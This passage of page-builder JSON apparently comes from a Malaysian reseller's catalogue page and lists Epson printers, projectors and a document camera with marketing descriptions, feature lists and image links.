DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li><li>4.3\\u201d Colour LCD Touch Panel<\\/li><li>Print, Scan, Copy Fax with ADF<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EcoTank L3150\\u00a0<img class=\\\"alignnone wp-image-2421\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L120 Printer\\u00a0<img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson M1100 Printer\\u00a0<img class=\\\"alignnone wp-image-2423\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson AcuLaser C9300N\\u00a0<img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0Epson WorkForce AL-M320DN\\u00a0<img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce AL-M8100DN\\u00a0<img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson TM-H6000IV\\u00a0<\\/p><p><img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson TM-T88V-i\\u00a0<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson TM-T70II\\u00a0<img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L1800 A3 Photo Ink Tank Printer<\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L850 Printer\\u00a0<img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L805 Printer\\u00a0<img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-2055<img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-2142W\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-L500W\\u00a0<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson LightScene EV-105<\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p>Epson EB-1785W\\u00a0<img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-536Wi\\u00a0<img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson 595Wi\\/585Wi\\/575Wi\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-L1405UNL\\u00a0<img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-G7400UNL\\u00a0<img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-Z10000U\\u00a0<img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p>Document Camera ELPDC21\\u00a0<img class=\\\"alignnone wp-image-2444\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with 